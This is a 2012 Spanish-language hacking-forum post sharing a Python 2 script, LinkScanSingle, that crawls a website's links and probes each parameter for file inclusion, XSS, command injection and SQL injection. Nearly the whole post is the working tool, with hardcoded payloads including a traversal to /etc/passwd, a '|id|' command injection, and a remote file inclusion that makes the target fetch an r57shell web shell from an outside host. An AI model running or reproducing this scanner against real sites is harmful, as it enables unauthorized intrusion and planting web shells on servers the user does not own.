SQL Injection Scanner [code]

Iniciado por ANTRAX, Marzo 30, 2012, 12:46:21 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Marzo 30, 2012, 12:46:21 PM Ultima modificación: Mayo 03, 2014, 09:38:04 AM por Flemon
Código: python
#!/usr/bin/python
#LinkScanSingle will take a site and
#collect links from the source. If the link
#contains a = it checks LFI,XSS,RFI,SQL,CMD injection
#searching source (simple)

#If your going to use a different shell then the
#one I have supplied, you will need to change line
#54 (r57shell) to something in your shell source.

from sgmllib import SGMLParser
import sys, urllib, httplib, re, urllib2, sets, socket

socket.setdefaulttimeout(5)

class URLLister(SGMLParser):
   def reset(self):
      SGMLParser.reset(self)
      self.urls = []

   def start_a(self, attrs):
      href = [v for k, v in attrs if k=='href']
      if href:
         self.urls.extend(href)

def parse_urls(links):
   urls = []
   for link in links:
      num = link.count("=")
      if num > 0:
         for x in xrange(num):
            x = x+1
            if link[0] == "/" or link[0] == "?":
               url = site+link.rsplit("=",x)[0]+"="
            else:
               url = link.rsplit("=",x)[0]+"="
            if url.find(site.split(".",1)[1]) == -1:
               url = site+url
            if url.count("//") > 1:
               url = "http://"+url[7:].replace("//","/",1)
            urls.append(url)
   urls = list(sets.Set(urls))
   return urls

def main(host):
   print "\n\t[+] Testing:",host,"\n"
   try:
      if verbose == 1:
         print "[+] Checking XSS"
      xss(host)
   except(urllib2.HTTPError, urllib2.URLError), msg:
      #print "[-] XSS Error:",msg
      pass
   try:
      if verbose == 1:
         print "[+] Checking LFI"
      lfi(host)
   except(urllib2.HTTPError, urllib2.URLError), msg:
      #print "[-] LFI Error:",msg
      pass
   try:
      if verbose == 1:
         print "[+] Checking RFI"
      rfi(host)
   except(urllib2.HTTPError, urllib2.URLError), msg:
      #print "[-] RFI Error:",msg
      pass
   try:
      if verbose == 1:
         print "[+] Checking CMD"
      cmd(host)
   except(urllib2.HTTPError, urllib2.URLError), msg:
      #print "[-] CMD Error:",msg
      pass
   try:
      if verbose == 1:
         print "[+] Checking SQL"
      sql(host)
   except(urllib2.HTTPError, urllib2.URLError), msg:
      #print "[-] SQL Error:",msg
      pass

def rfi(host):

   try:
      source = urllib2.urlopen(host+RFI).read()
      if re.search("r57shell", source):
         print "[+] RFI:",host+RFI
      else:
         if verbose == 1:
            print "[-] Not Vuln."
   except(),msg:
      #print "[-] Error Occurred",msg
      pass

def xss(host):
   source = urllib2.urlopen(host+XSS).read()
   if re.search("XSS", source) != None:
      print "[!] XSS:",host+XSS
   else:
      if verbose == 1:
         print "[-] Not Vuln."

def sql(host):
   for pload in SQL:
      source = urllib2.urlopen(host+pload).read()
      if re.search("Warning:", source) != None:
         print "[!] SQL:",host+pload
      else:
         if verbose == 1:
            print "[-] Not Vuln."

def cmd(host):
   source = urllib2.urlopen(host+CMD).read()
   if re.search("uid=", source) != None:
      print "[!] CMD:",host+CMD
   else:
      if verbose == 1:
         print "[-] Not Vuln."

def lfi(host):

   source = urllib2.urlopen(host+LFI).read()
   if re.search("root:", source) != None:
      print "[!] LFI:",host+LFI
   else:
      if verbose == 1:
         print "[-] Not Vuln."
   source = urllib2.urlopen(host+LFI+"%00").read()
   if re.search("root:", source) != None:
      print "[!] LFI:",host+LFI+"%00"
   else:
      if verbose == 1:
         print "[-] Not Vuln. w/  Null Byte"

print "\n\t   d3hydr8[at]gmail[dot]com LinkScanSingle v1.3"
print "\t-------------------------------------------------\n"

if len(sys.argv) not in [2,3]:
   print "Usage : ./linkscan.py <site> [option]"
   print "Ex: ./linkscan.py [url]http://www.google.com[/url] -verbose"
   print "\n\t[Option]"
   print "\t\t-verbose/-v | Verbose Output\n"
   sys.exit(1)

LFI = "../../../../../../../../../../../../etc/passwd"
RFI = "http://yozurino.com/r.txt?"
RFI_TITLE = "Target"
XSS = "%22%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E"
CMD = "|id|"
SQL = ["-1","999999"] #Add more or change sql payloads

site = sys.argv[1].replace("\n","")
print "\n[+] Collecting:",site
try:
   if sys.argv[2].lower() == "-v" or sys.argv[2].lower() == "-verbose":
      verbose = 1
      print "[+] Verbose Mode On\n"
except(IndexError):
   print "[-] Verbose Mode Off\n"
   verbose = 0
   pass
site = site.replace("http://","").rsplit("/",1)[0]+"/"
site = "http://"+site.lower()
try:
   usock = urllib.urlopen(site)
   parser = URLLister()
   parser.feed(usock.read().lower())
   parser.close()
   usock.close()
except(IOError, urllib2.URLError), msg:
   print "[-] Error Connecting to",site
   print "[-]",msg
   sys.exit(1)
urls = parse_urls(parser.urls)
print "[+] Links Found:",len(urls)
for url in urls:
   try:
      main(url)
   except(KeyboardInterrupt):
      pass
print "\n[-] Done\n"